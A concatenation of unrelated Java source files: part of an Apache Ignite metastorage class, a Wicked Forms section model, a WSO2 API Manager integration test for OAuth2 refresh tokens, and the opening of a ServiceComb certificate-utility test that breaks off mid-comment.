                ptr = wal.log(new MetastoreDataRecord(key, null));

                tree.removex(oldRow);
                tree.rowStore().removeRow(oldRow.link());

                if (oldRow.keyLink() != 0L)
                    tree.rowStore().removeRow(oldRow.keyLink());
            }

            wal.flush(ptr, false);
        }
    }

    /** */
    private void checkRootsPageIdFlag(long treeRoot, long reuseListRoot) throws StorageException {
        if (PageIdUtils.flag(treeRoot) != FLAG_AUX && PageIdUtils.flag(treeRoot) != FLAG_DATA)
            throw new StorageException("Wrong tree root page id flag: treeRoot="
                + U.hexLong(treeRoot) + ", METASTORAGE_CACHE_ID=" + METASTORAGE_CACHE_ID);

        if (PageIdUtils.flag(reuseListRoot) != FLAG_AUX && PageIdUtils.flag(reuseListRoot) != FLAG_DATA)
            throw new StorageException("Wrong reuse list root page id flag: reuseListRoot="
                + U.hexLong(reuseListRoot) + ", METASTORAGE_CACHE_ID=" + METASTORAGE_CACHE_ID);
    }

    /**
     * Initializing the selected partition for use as MetaStorage
     *
     * @param partId Partition id.
     * @return true if the partion is empty
     */
    private boolean getOrAllocateMetas(int partId) throws IgniteCheckedException {
        empty = false;

        PageMemoryEx pageMem = (PageMemoryEx)dataRegion.pageMemory();

        long partMetaId = pageMem.partitionMetaPageId(METASTORAGE_CACHE_ID, partId);
        long partMetaPage = pageMem.acquirePage(METASTORAGE_CACHE_ID, partMetaId);

        try {
            if (readOnly) {
                // Read-only mode never allocates; an uninitialized meta page means empty.
                long pageAddr = pageMem.readLock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage);

                try {
                    if (PageIO.getType(pageAddr) != PageIO.T_PART_META) {
                        empty = true;

                        return true;
                    }

                    PagePartitionMetaIO io = PageIO.getPageIO(pageAddr);

                    long treeRoot = io.getTreeRoot(pageAddr);
                    long reuseListRoot = io.getReuseListRoot(pageAddr);

                    checkRootsPageIdFlag(treeRoot, reuseListRoot);

                    this.treeRoot = new RootPage(new FullPageId(treeRoot, METASTORAGE_CACHE_ID), false);
                    this.reuseListRoot = new RootPage(new FullPageId(reuseListRoot, METASTORAGE_CACHE_ID), false);

                    rmvId.set(io.getGlobalRemoveId(pageAddr));
                }
                finally {
                    pageMem.readUnlock(METASTORAGE_CACHE_ID, partId, partMetaPage);
                }
            }
            else {
                boolean allocated = false;

                long pageAddr = pageMem.writeLock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage);

                try {
                    long treeRoot, reuseListRoot;

                    if (PageIO.getType(pageAddr) != PageIO.T_PART_META) {
                        // Initialize new page.
                        PagePartitionMetaIO io = PagePartitionMetaIO.VERSIONS.latest();

                        PageMetrics metrics = pageMem.metrics().cacheGrpPageMetrics(METASTORAGE_CACHE_ID);

                        //MetaStorage never encrypted so realPageSize == pageSize.
                        io.initNewPage(pageAddr, partMetaId, pageMem.pageSize(), metrics);

                        treeRoot = pageMem.allocatePage(METASTORAGE_CACHE_ID, partId, FLAG_AUX);
                        reuseListRoot = pageMem.allocatePage(METASTORAGE_CACHE_ID, partId, FLAG_AUX);

                        assert PageIdUtils.flag(treeRoot) == FLAG_AUX;
                        assert PageIdUtils.flag(reuseListRoot) == FLAG_AUX;

                        io.setTreeRoot(pageAddr, treeRoot);
                        io.setReuseListRoot(pageAddr, reuseListRoot);

                        if (PageHandler.isWalDeltaRecordNeeded(pageMem, METASTORAGE_CACHE_ID, partMetaId,
                            partMetaPage, wal, null)) {
                            assert io.getType() == PageIO.T_PART_META;

                            wal.log(new MetaPageInitRecord(
                                METASTORAGE_CACHE_ID,
                                partMetaId,
                                io.getType(),
                                io.getVersion(),
                                treeRoot,
                                reuseListRoot
                            ));
                        }

                        allocated = true;
                    }
                    else {
                        PagePartitionMetaIO io = PageIO.getPageIO(pageAddr);

                        treeRoot = io.getTreeRoot(pageAddr);
                        reuseListRoot = io.getReuseListRoot(pageAddr);

                        rmvId.set(io.getGlobalRemoveId(pageAddr));

                        checkRootsPageIdFlag(treeRoot, reuseListRoot);
                    }

                    this.treeRoot = new RootPage(new FullPageId(treeRoot, METASTORAGE_CACHE_ID), allocated);
                    this.reuseListRoot = new RootPage(new FullPageId(reuseListRoot, METASTORAGE_CACHE_ID), allocated);
                }
                finally {
                    pageMem.writeUnlock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage, null, allocated);
                }
            }
        }
        finally {
            pageMem.releasePage(METASTORAGE_CACHE_ID, partMetaId, partMetaPage);
        }

        return false;
    }

    /**
     * @return Page memory.
     */
    public PageMemory pageMemory() {
        return dataRegion.pageMemory();
    }

    /** {@inheritDoc} */
    @Override public void onMarkCheckpointBegin(Context ctx) throws IgniteCheckedException {
        Executor executor = ctx.executor();

        if (executor == null) {
            partStorage.saveMetadata(IoStatisticsHolderNoOp.INSTANCE);

            saveStoreMetadata();
        }
        else {
            // Offload both metadata saves to the checkpoint executor when available.
            executor.execute(() -> {
                try {
                    partStorage.saveMetadata(IoStatisticsHolderNoOp.INSTANCE);
                }
                catch (IgniteCheckedException e) {
                    throw new IgniteException(e);
                }
            });

            executor.execute(() -> {
                try {
                    saveStoreMetadata();
                }
                catch (IgniteCheckedException e) {
                    throw new IgniteException(e);
                }
            });
        }
    }

    /** {@inheritDoc} */
    @Override public void beforeCheckpointBegin(Context ctx) throws IgniteCheckedException {
        partStorage.saveMetadata(IoStatisticsHolderNoOp.INSTANCE);
    }

    /** {@inheritDoc} */
    @Override public void onCheckpointBegin(Context ctx) throws IgniteCheckedException {
        /* No-op. */
    }

    /**
     * @throws IgniteCheckedException If failed.
     */
    private void saveStoreMetadata() throws IgniteCheckedException {
        // Persist the global remove id into the partition meta page.
        PageMemoryEx pageMem = (PageMemoryEx)pageMemory();

        long partMetaId = pageMem.partitionMetaPageId(METASTORAGE_CACHE_ID, partId);
        long partMetaPage = pageMem.acquirePage(METASTORAGE_CACHE_ID, partMetaId);

        try {
            long partMetaPageAddr = pageMem.writeLock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage);

            if (partMetaPageAddr == 0L) {
                U.warn(log, "Failed to acquire write lock for meta page [metaPage=" + partMetaPage + ']');

                return;
            }

            boolean changed = false;

            try {
                PagePartitionMetaIO io = PageIO.getPageIO(partMetaPageAddr);

                changed |= io.setGlobalRemoveId(partMetaPageAddr, rmvId.get());
            }
            finally {
                pageMem.writeUnlock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage, null, changed);
            }
        }
        finally {
            pageMem.releasePage(METASTORAGE_CACHE_ID, partMetaId, partMetaPage);
        }
    }

    /** */
    public void applyUpdate(String key, byte[] value) throws IgniteCheckedException {
        if (readOnly) {
            // Buffer the update; a null value is recorded as a TOMBSTONE removal.
            if (lastUpdates == null)
                lastUpdates = new TreeMap<>();

            lastUpdates.put(key, value != null ? value : TOMBSTONE);
        }
        else {
            if (value != null)
                writeRaw(key, value);
            else
                removeData(key);
        }
    }

    /** */
    public Marshaller marshaller() {
        return marshaller;
    }

    /**
     * Temporary storage internal
     */
    private interface TmpStorageInternal extends Closeable {
        /**
         * Put data
         *
         * @param key Key.
         * @param val Value.
         */
        boolean add(String key, byte[] val) throws IOException;

        /**
         * Read data from storage
         */
        Stream<IgniteBiTuple<String, byte[]>> stream() throws IOException;
    }

    /**
     * Temporary storage (memory)
     */
    private static class MemoryTmpStorage implements TmpStorageInternal {
        /** Buffer. */
        final ByteBuffer buf;

        /** Size. */
        int size;

        /**
         * @param size Size.
         */
        MemoryTmpStorage(int size) {
            buf = ByteBuffer.allocateDirect(size);
        }

        /** {@inheritDoc} */
        @Override public boolean add(String key, byte[] val) {
            byte[] keyData = key.getBytes(StandardCharsets.UTF_8);

            // Entry layout: [keyLen:int][valLen:int][keyBytes][valBytes].
            if (val.length + keyData.length + 8 > buf.remaining())
                return false;

            buf.putInt(keyData.length).putInt(val.length).put(keyData).put(val);

            size++;

            return true;
        }

        /** {@inheritDoc} */
        @Override public Stream<IgniteBiTuple<String, byte[]>> stream() {
            buf.flip();

            return Stream.generate(() -> {
                int keyLen = buf.getInt();
                int dataLen = buf.getInt();

                byte[] tmpBuf = new byte[Math.max(keyLen, dataLen)];

                buf.get(tmpBuf, 0, keyLen);

                String key = new String(tmpBuf, 0, keyLen, StandardCharsets.UTF_8);

                buf.get(tmpBuf, 0, dataLen);

                return new IgniteBiTuple<>(key, tmpBuf.length > dataLen ? Arrays.copyOf(tmpBuf, dataLen) : tmpBuf);
            }).limit(size);
        }

        /** {@inheritDoc} */
        @Override public void close() throws IOException {
        }
    }

    /**
     * Temporary storage (file)
     */
    private static class FileTmpStorage implements TmpStorageInternal {
        /** Cache. */
        final ByteBuffer cache = ByteBuffer.allocateDirect(TEMPORARY_METASTORAGE_BUFFER_SIZE);

        /** File. Created lazily on first add. */
        RandomAccessFile file;

        /** Size. */
        long size;

        /** {@inheritDoc} */
        @Override public boolean add(String key, byte[] val) throws IOException {
            if (file == null)
                file = new RandomAccessFile(File.createTempFile("m_storage", "bin"), "rw");

            byte[] keyData = key.getBytes(StandardCharsets.UTF_8);

            if (val.length + keyData.length + 8 > cache.remaining())
                flushCache(false);

            cache.putInt(keyData.length).putInt(val.length).put(keyData).put(val);

            size++;

            return true;
        }

        /** {@inheritDoc} */
        @Override public Stream<IgniteBiTuple<String, byte[]>> stream() throws IOException {
            if (file == null)
                return Stream.empty();

            flushCache(true);

            file.getChannel().position(0);

            readToCache();

            return Stream.generate(() -> {
                // Refill the buffer whenever a whole header or entry may not fit.
                if (cache.remaining() <= 8) {
                    cache.compact();

                    try {
                        readToCache();
                    }
                    catch (IOException e) {
                        throw new IgniteException(e);
                    }
                }

                int keyLen = cache.getInt();
                int dataLen = cache.getInt();

                if (cache.remaining() < keyLen + dataLen) {
                    cache.compact();

                    try {
                        readToCache();
                    }
                    catch (IOException e) {
                        throw new IgniteException(e);
                    }
                }

                byte[] tmpBuf = new byte[Math.max(keyLen, dataLen)];

                cache.get(tmpBuf, 0, keyLen);

                String key = new String(tmpBuf, 0, keyLen, StandardCharsets.UTF_8);

                cache.get(tmpBuf, 0, dataLen);

                return new IgniteBiTuple<>(key, tmpBuf.length > dataLen ? Arrays.copyOf(tmpBuf, dataLen) : tmpBuf);
            }).limit(size);
        }

        /** {@inheritDoc} */
        @Override public void close() throws IOException {
            file.close();
        }

        /**
         * Read data to cache
         */
        private void readToCache() throws IOException {
            int len = (int)Math.min(file.length() - file.getChannel().position(), cache.remaining());

            while (len > 0)
                len -= file.getChannel().read(cache);

            cache.flip();
        }

        /**
         * Write cache to file.
         *
         * @param force force metadata.
         */
        private void flushCache(boolean force) throws IOException {
            if (cache.position() > 0) {
                cache.flip();

                while (cache.remaining() > 0)
                    file.getChannel().write(cache);

                cache.clear();
            }

            file.getChannel().force(force);
        }
    }

    /**
     * Temporary storage
     */
    public static class TmpStorage implements Closeable {
        /** Chain of internal storages. */
        final List<TmpStorageInternal> chain = new ArrayList<>(2);

        /** Current internal storage. */
        TmpStorageInternal current;

        /** Logger. */
        final IgniteLogger log;

        /**
         * @param memBufSize Memory buffer size.
         * @param log Logger.
         */
        TmpStorage(int memBufSize, IgniteLogger log) {
            this.log = log;

            chain.add(current = new MemoryTmpStorage(memBufSize));
        }

        /**
         * Put data
         *
         * @param key Key.
         * @param val Value.
         */
        public void add(String key, byte[] val) throws IgniteCheckedException {
            try {
                // Spill over to file-backed storage when the current one is full.
                while (!current.add(key, val))
                    chain.add(current = new FileTmpStorage());
            }
            catch (IOException e) {
                throw new IgniteCheckedException(e);
            }
        }

        /**
         * Read data from storage
         */
        public Stream<IgniteBiTuple<String, byte[]>> stream() {
            return chain.stream().flatMap(storage -> {
                try {
                    return storage.stream();
                }
                catch (IOException e) {
                    throw new IgniteException(e);
                }
            });
        }

        /** {@inheritDoc} */
        @Override public void close() throws IOException {
            for (TmpStorageInternal storage : chain) {
                try {
                    storage.close();
                }
                catch (IOException ex) {
                    log.error(ex.getMessage(), ex);
                }
            }
        }
    }
}
/**
 * Copyright 2013 Wicked Forms (https://github.com/thombergs/wicked-forms)
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package de.adesso.wickedforms.model;

import org.apache.commons.lang.builder.ToStringBuilder;
import org.apache.commons.lang.builder.ToStringStyle;

import de.adesso.wickedforms.model.elements.AbstractFormElement;

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

/**
 * A section of a dynamic form. With sections, multiple form elements that
 * belong together can be combined.
 * <p/>
 * A Wicked Forms interpreter should display a section in a way that makes it
 * visible to the user that the contained form elements belong together.
 *
 * @author Tom Hombergs (tom.hombergs@gmail.com)
 *
 */
public class Section extends AbstractFormElement {

	/** The title displayed for this section (null for hidden sections). */
	private String label;

	/** Child elements; order of the list is NOT the display order — see getFormElements(). */
	private final List<AbstractFormElement> formElements = new ArrayList<AbstractFormElement>();

	/** Whether this section is rendered without title and visual border. */
	private boolean hidden = false;

	/** Whether a "remove" button should be displayed for this section. */
	private boolean showRemoveButton = false;

	/**
	 * Constructor.
	 *
	 * @param label
	 *          the title of the form. This title should be displayed
	 *          prominently by a Wicked Forms interpreter.
	 */
	public Section(final String label) {
		this.label = label;
	}

	/**
	 * Constructs a hidden section (i.e. without title and without visual
	 * border).
	 */
	public Section() {
		this.hidden = true;
	}

	/**
	 * Sets the title of this section.
	 *
	 * @param label
	 *          the new title.
	 * @return this object for chaining
	 */
	public Section setLabel(final String label) {
		this.label = label;
		return this;
	}

	/**
	 * Returns the title of this section, as set via the constructor or
	 * {@link #setLabel(String)}.
	 *
	 * @return the title, or {@code null} for a hidden section.
	 */
	public String getTitle() {
		return this.label;
	}

	/**
	 * Adds a form element to the end of this section.
	 *
	 * @param element
	 *          the element to add.
	 * @return this object for chaining
	 */
	public Section add(final AbstractFormElement element) {
		element.setIndex(this.formElements.size());
		element.setParentSection(this);
		this.formElements.add(element);
		return this;
	}

	/**
	 * Removes a form element from this section. If the element was contained,
	 * its parent section is cleared and the indices of all elements behind it
	 * are shifted down by one. Removing an element that is not part of this
	 * section is a no-op.
	 *
	 * @param elementToRemove
	 *          the element to remove.
	 * @return this object for chaining
	 */
	public Section remove(final AbstractFormElement elementToRemove) {
		if (this.formElements.remove(elementToRemove)) {
			elementToRemove.setParentSection(null);
			// shift the index of all form elements behind the removed one down by one
			for (AbstractFormElement element : this.formElements) {
				if (element.getIndex() > elementToRemove.getIndex()) {
					element.setIndex(element.getIndex() - 1);
				}
			}
		}
		return this;
	}

	/**
	 * Inserts a new element before another element.
	 * <p/>
	 * Internal note: the element is actually added into the formElements list
	 * as the last item! The newly added form element and all elements behind it
	 * will merely have {@link AbstractFormElement#setIndex(Integer)}
	 * called with the according index. This is due to the fact that frameworks
	 * working on the formElements List may access the elements by List index
	 * and may thus be unable to work with elements shifting within the List.
	 *
	 * @param newElement
	 *          the new element to insert
	 * @param beforeThis
	 *          the element before which to insert the new element
	 * @throws IllegalArgumentException
	 *           if the element before which to insert is not found in this
	 *           section.
	 * @return this object for chaining
	 */
	public Section insertBefore(final AbstractFormElement newElement, final AbstractFormElement beforeThis) {
		int index = beforeThis.getIndex();
		if (index == -1) {
			throw new IllegalArgumentException(
			    "this section does not contain the form element before which to insert the new element!");
		}

		// shift the index of all form elements behind the new one by one
		for (AbstractFormElement element : this.formElements) {
			if (element.getIndex() >= index) {
				element.setIndex(element.getIndex() + 1);
			}
		}

		newElement.setParentSection(this);
		newElement.setIndex(index);
		this.formElements.add(newElement);
		return this;
	}

	/**
	 * Retrieves all form elements currently contained in this section.
	 * <p/>
	 * Note that the returned list is not necessarily sorted by the index of the
	 * contained form elements! To have them sorted, use a comparator that sorts
	 * by {@link AbstractFormElement#getIndex()}.
	 *
	 * @return the form elements (unmodifiable view).
	 */
	public List<AbstractFormElement> getFormElements() {
		return Collections.unmodifiableList(this.formElements);
	}

	/**
	 * Sets whether this section is hidden (rendered without title and border).
	 *
	 * @param hidden
	 *          the new hidden state.
	 * @return this object for chaining
	 */
	public Section setHidden(final boolean hidden) {
		this.hidden = hidden;
		return this;
	}

	/**
	 * @return whether this section is hidden.
	 */
	public boolean isHidden() {
		return this.hidden;
	}

	/**
	 * Assigns each form element that is part of this section a unique id if it
	 * does not have an id yet.
	 *
	 * @param startValue
	 *          the ID to start with
	 * @return the next ID to be assigned after this section was processed
	 */
	protected int assignIds(int startValue) {
		setId("" + startValue++);
		for (AbstractFormElement formElement : this.getFormElements()) {
			if (formElement instanceof Section) {
				// recurse; the nested section returns the next free id.
				// (Fixed: a former post-increment here was dead code — its
				// incremented value was immediately overwritten by this assignment.)
				startValue = ((Section) formElement).assignIds(startValue);
			} else if (formElement.getId() == null || "".equals(formElement.getId())) {
				formElement.setId("" + startValue++);
			}
		}
		return startValue;
	}

	@Override
	public String toString() {
		return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE);
	}

	/**
	 * Sets whether a "remove" button should be displayed for this section.
	 *
	 * @param showRemoveButton
	 *          whether to show the button.
	 * @return this object for chaining
	 */
	public Section setShowRemoveButton(boolean showRemoveButton) {
		this.showRemoveButton = showRemoveButton;
		return this;
	}

	/**
	 * Determines if a "remove" button should be displayed for this section.
	 *
	 * @return whether the button should be shown.
	 */
	public boolean isShowRemoveButton() {
		return this.showRemoveButton;
	}

	/**
	 * recursive search through the forms sections/elements for the given id
	 *
	 * @param id
	 *          like the given id in the XML-form
	 * @return the form element with the given id, or {@code null} if none found.
	 */
	public AbstractFormElement getElementById(String id) {
		AbstractFormElement element = null;

		// this element is the searched one
		// (null-safe: elements whose id was never assigned simply don't match,
		// instead of triggering a NullPointerException)
		if (id != null && id.equals(getId())) {
			return this;
		} else {
			for (AbstractFormElement formElement : formElements) {
				// the child element is the searched one
				if (id != null && id.equals(formElement.getId())) {
					return formElement;
				}
				// search in child-elements
				if (formElement instanceof Section) {
					element = ((Section) formElement).getElementById(id);
					if (element != null)
						return element;
				}
			}
		}
		// no element found
		return null;
	}
}
/*
*Copyright (c) 2015, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
*
*WSO2 Inc. licenses this file to you under the Apache License,
*Version 2.0 (the "License"); you may not use this file except
*in compliance with the License.
*You may obtain a copy of the License at
*
*http://www.apache.org/licenses/LICENSE-2.0
*
*Unless required by applicable law or agreed to in writing,
*software distributed under the License is distributed on an
*"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
*KIND, either express or implied. See the License for the
*specific language governing permissions and limitations
*under the License.
*/

package org.wso2.am.integration.tests.token;

import org.apache.commons.lang.StringUtils;
import org.json.JSONObject;
import org.testng.annotations.AfterClass;
import org.testng.annotations.BeforeClass;
import org.testng.annotations.DataProvider;
import org.testng.annotations.Factory;
import org.testng.annotations.Test;
import org.wso2.am.integration.test.utils.base.APIMIntegrationBaseTest;
import org.wso2.am.integration.test.utils.base.APIMIntegrationConstants;
import org.wso2.am.integration.test.utils.bean.APILifeCycleState;
import org.wso2.am.integration.test.utils.bean.APILifeCycleStateRequest;
import org.wso2.am.integration.test.utils.bean.APIRequest;
import org.wso2.am.integration.test.utils.bean.APPKeyRequestGenerator;
import org.wso2.am.integration.test.utils.bean.SubscriptionRequest;
import org.wso2.am.integration.test.utils.clients.APIPublisherRestClient;
import org.wso2.am.integration.test.utils.clients.APIStoreRestClient;
import org.wso2.am.integration.test.utils.generic.APIMTestCaseUtils;
import org.wso2.carbon.automation.engine.annotations.ExecutionEnvironment;
import org.wso2.carbon.automation.engine.annotations.SetEnvironment;
import org.wso2.carbon.automation.engine.context.AutomationContext;
import org.wso2.carbon.automation.engine.context.TestUserMode;
import org.wso2.carbon.automation.test.utils.http.client.HttpRequestUtil;
import org.wso2.carbon.automation.test.utils.http.client.HttpResponse;
import org.wso2.carbon.integration.common.utils.mgt.ServerConfigurationManager;

import javax.ws.rs.core.Response;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;

import static org.testng.Assert.assertEquals;
import static org.testng.Assert.assertFalse;
import static org.testng.Assert.assertTrue;

/**
 * Integration test for the OAuth2 refresh-token grant: publishes a test API,
 * subscribes an application, obtains an access/refresh token pair via the
 * password grant, invokes the API, then exchanges the refresh token for a new
 * access token and invokes the API again. Runs for both super-tenant and
 * tenant admin users (see {@link #userModeDataProvider()}).
 */
@SetEnvironment(executionEnvironments = {ExecutionEnvironment.STANDALONE})
public class RefreshTokenTestCase extends APIMIntegrationBaseTest {

    // REST clients for the publisher and store web apps; created in setEnvironment().
    private APIPublisherRestClient apiPublisher;
    private APIStoreRestClient apiStore;

    // NOTE(review): only used by the commented-out configuration steps in
    // setEnvironment(); kept for external distributed-deployment runs.
    private ServerConfigurationManager serverConfigurationManager;

    // Backend service URL the test API proxies to; set in setEnvironment().
    private static String backEndEndpointUrl;

    private static final String APPLICATION_NAME = "RefreshTokenTestAPI-Application";

    /**
     * TestNG factory constructor: one test-class instance per user mode from
     * {@link #userModeDataProvider()}.
     */
    @Factory(dataProvider = "userModeDataProvider")
    public RefreshTokenTestCase(TestUserMode userMode) {
        this.userMode = userMode;
    }

    /** User modes the test is instantiated for. */
    @DataProvider
    public static Object[][] userModeDataProvider() {
        return new Object[][]{
                new Object[]{TestUserMode.SUPER_TENANT_ADMIN},
                new Object[]{TestUserMode.TENANT_ADMIN},
        };
    }

    /**
     * Initializes the test context for the configured user mode and creates
     * the publisher/store REST clients.
     */
    @BeforeClass(alwaysRun = true)
    public void setEnvironment() throws Exception {
        super.init(userMode);

        /*
          If test run in external distributed deployment you need to copy
          following resources accordingly.
          configFiles/hostobjecttest/api-manager.xml
          configFiles/tokenTest/log4j.properties
        */
//        serverConfigurationManager.applyConfiguration(
//                new File(getAMResourceLocation() + File.separator + "configFiles" + File.separator +
//                         "tokenTest" + File.separator + "api-manager.xml"));
//        serverConfigurationManager.applyConfiguration(
//                new File(getAMResourceLocation() + File.separator + "configFiles" + File.separator +
//                         "tokenTest" + File.separator + "log4j.properties"));

        backEndEndpointUrl = getGatewayURLHttp() + "jaxrs_basic/services/customers/customerservice";

        serverConfigurationManager = new ServerConfigurationManager(
                new AutomationContext(APIMIntegrationConstants.AM_PRODUCT_GROUP_NAME,
                                      APIMIntegrationConstants.AM_GATEWAY_WRK_INSTANCE,
                                      TestUserMode.SUPER_TENANT_ADMIN));

        String publisherURLHttp = publisherUrls.getWebAppURLHttp();
        String storeURLHttp = storeUrls.getWebAppURLHttp();

        apiPublisher = new APIPublisherRestClient(publisherURLHttp);
        apiStore = new APIStoreRestClient(storeURLHttp);
    }

    /**
     * End-to-end refresh-token scenario. The exact sequence of remote calls
     * (publish -> subscribe -> key generation -> token grants -> invocations)
     * is significant; do not reorder.
     */
    @Test(groups = {"wso2.am"}, description = "Test Refresh token functionality")
    public void testRefreshTokenAPITestCase() throws Exception {

        String apiName = "RefreshTokenTestAPI";
        String apiContext = "refreshTokenTestAPI";
        String tags = "sample, token, media";
        String description = "This is test API create by API manager integration test";
        String apiVersion = "1.0.0";

        //Login to publisher
        apiPublisher.login(publisherContext.getContextTenant().getContextUser().getUserName(),
                           publisherContext.getContextTenant().getContextUser().getPassword());

        //Create API.
        APIRequest apiRequest = new APIRequest(apiName, apiContext, new URL(backEndEndpointUrl));
        apiRequest.setTags(tags);
        apiRequest.setDescription(description);
        apiRequest.setVersion(apiVersion);
        apiRequest.setSandbox(backEndEndpointUrl);
        apiRequest.setProvider(user.getUserName());
        apiPublisher.addAPI(apiRequest);

        //Publish API.
        APILifeCycleStateRequest updateRequest =
                new APILifeCycleStateRequest(apiName, user.getUserName(), APILifeCycleState.PUBLISHED);
        apiPublisher.changeAPILifeCycleStatus(updateRequest);

        //Login to Store.
        apiStore.login(storeContext.getContextTenant().getContextUser().getUserName(),
                       storeContext.getContextTenant().getContextUser().getPassword());

        //Add Application.
        apiStore.addApplication(APPLICATION_NAME, APIMIntegrationConstants.APPLICATION_TIER.LARGE, "", "this-is-test");

        //Subscribe Application to API.
        SubscriptionRequest subscriptionRequest = new SubscriptionRequest(apiName,
                                                                          storeContext.getContextTenant()
                                                                                      .getContextUser()
                                                                                      .getUserName());
        subscriptionRequest.setTier(APIMIntegrationConstants.API_TIER.GOLD);
        subscriptionRequest.setApplicationName(APPLICATION_NAME);
        apiStore.subscribe(subscriptionRequest);

        //Get Consumer Key and Consumer Secret//Generate production token and invoke with that
        APPKeyRequestGenerator generateAppKeyRequest = new APPKeyRequestGenerator(APPLICATION_NAME);
        String responseString = apiStore.generateApplicationKey(generateAppKeyRequest).getData();
        JSONObject response = new JSONObject(responseString);

        // get Consumer Key and Consumer Secret
        String consumerKey = response.getJSONObject("data").getJSONObject("key").getString("consumerKey");
        String consumerSecret = response.getJSONObject("data").getJSONObject("key").getString("consumerSecret");

        URL tokenEndpointURL = new URL(getGatewayURLNhttp() + "token");

        //Get an Access Token from the user who is logged into the API Store. See APIMANAGER-3152.
        String subsAccessTokenPayload = APIMTestCaseUtils.getPayloadForPasswordGrant(
                storeContext.getContextTenant().getContextUser().getUserName(),
                storeContext.getContextTenant().getContextUser().getPassword());

        JSONObject subsAccessTokenGenerationResponse = new JSONObject(
                apiStore.generateUserAccessKey(consumerKey, consumerSecret, subsAccessTokenPayload,
                                               tokenEndpointURL).getData());
        String subsRefreshToken = subsAccessTokenGenerationResponse.getString("refresh_token");

        assertFalse(StringUtils.isEmpty(subsRefreshToken),
                    "Refresh token of access token generated by subscriber is empty");

        //Obtain user access token
        String requestBody = APIMTestCaseUtils.getPayloadForPasswordGrant(user.getUserName(), user.getPassword());

        JSONObject accessTokenGenerationResponse = new JSONObject(
                apiStore.generateUserAccessKey(consumerKey, consumerSecret, requestBody,
                                               tokenEndpointURL).getData());

        // get Access Token and Refresh Token
        String userAccessToken = accessTokenGenerationResponse.getString("access_token");
        String refreshToken = accessTokenGenerationResponse.getString("refresh_token");

        Map<String, String> requestHeaders = new HashMap<String, String>();

        //Check Access Token
        requestHeaders.put("Authorization", "Bearer " + userAccessToken);
        requestHeaders.put("accept", "text/xml");

        String apiUrl = getAPIInvocationURLHttp("refreshTokenTestAPI/1.0.0/customers/123");

        HttpResponse httpResponse = HttpRequestUtil.doGet(apiUrl, requestHeaders);

        //TODO - Remove the second request below. This is a temporary workaround to avoid the issue caused by a bug in
        // carbon-mediation 4.4.11-SNAPSHOT See the thread "[Dev] [ESB] EmptyStackException when resuming a paused
        // message processor" on dev@wso2.org for information about the bug.
        Thread.sleep(5000);
        httpResponse = HttpRequestUtil.doGet(apiUrl, requestHeaders);

        assertEquals(httpResponse.getResponseCode(), Response.Status.OK.getStatusCode(), "Response code mismatched");
        assertTrue(httpResponse.getData().contains("John"), "Response data mismatched");
        assertTrue(httpResponse.getData().contains("<name>"), "Response data mismatched");
        assertTrue(httpResponse.getData().contains("<Customer>"), "Response data mismatched");

        //Get a new access token using refresh token
        String getAccessTokenFromRefreshTokenRequestBody =
                "grant_type=refresh_token&refresh_token=" + refreshToken + "&scope=PRODUCTION";
        accessTokenGenerationResponse = new JSONObject(
                apiStore.generateUserAccessKey(consumerKey, consumerSecret,
                                               getAccessTokenFromRefreshTokenRequestBody,
                                               tokenEndpointURL).getData());
        userAccessToken = accessTokenGenerationResponse.getString("access_token");

        requestHeaders = new HashMap<String, String>();

        //Check with new Access Token
        requestHeaders.put("Authorization", "Bearer " + userAccessToken);
        requestHeaders.put("accept", "text/xml");

        httpResponse = HttpRequestUtil.doGet(apiUrl, requestHeaders);

        assertEquals(httpResponse.getResponseCode(), Response.Status.OK.getStatusCode(), "Response code mismatched");
        assertTrue(httpResponse.getData().contains("John"), "Response data mismatched");
        assertTrue(httpResponse.getData().contains("<name"), "Response data mismatched");
        assertTrue(httpResponse.getData().contains("<Customer>"), "Response data mismatched");
    }

    /** Removes the test application (cascading the subscription) and cleans up. */
    @AfterClass(alwaysRun = true)
    public void destroy() throws Exception {
        apiStore.removeApplication(APPLICATION_NAME);
        super.cleanUp();
    }
}
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.apache.servicecomb.foundation.ssl;

import java.math.BigInteger;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.security.Principal;
import java.security.PublicKey;
import java.security.SignatureException;
import java.security.cert.CertificateEncodingException;
import java.security.cert.CertificateException;
import java.security.cert.CertificateExpiredException;
import java.security.cert.CertificateNotYetValidException;
import java.security.cert.X509Certificate;
import java.util.Date;
import java.util.Set;

import javax.security.auth.x500.X500Principal;

import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;

import mockit.Expectations;
import mockit.Mocked;

/**
 * Tests for {@code CertificateUtil}: CN extraction from the subject
 * X500Principal and owner/root-CA resolution over a certificate chain.
 * The abstract {@link X509Certificate} API is satisfied by the no-op stub
 * {@link MyX509Certificate}; the interesting calls are redirected via JMockit
 * {@code Expectations} on mocked instances.
 */
public class CertificateUtilTest {

  /**
   * Minimal concrete X509Certificate: every method is a stub returning
   * null/0/false. Only getSubjectX500Principal()/getIssuerX500Principal()
